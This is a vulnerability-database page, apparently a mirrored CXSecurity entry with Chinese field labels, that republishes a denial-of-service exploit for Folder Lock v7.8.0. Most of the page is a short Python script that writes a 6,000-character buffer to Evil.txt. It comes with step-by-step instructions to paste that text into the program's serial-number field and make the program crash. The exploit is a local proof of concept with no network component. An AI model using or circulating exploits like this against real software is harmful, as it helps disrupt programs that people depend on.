https://cxsecurity.com/issue/WLB-2019120116
Folder Lock v7.8.0 Denial of Service Exploit - CXSecurity.com






漏洞ID | 1877381 | 漏洞类型 | |
发布时间 | 2019-12-29 | 更新时间 | 2019-12-29 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Folder Lock v7.8.0 Denial of Service Exploit
# Date: 26.12.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.8.0
# Tested on: Windows 7 x64
# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
检索漏洞
开始时间
结束时间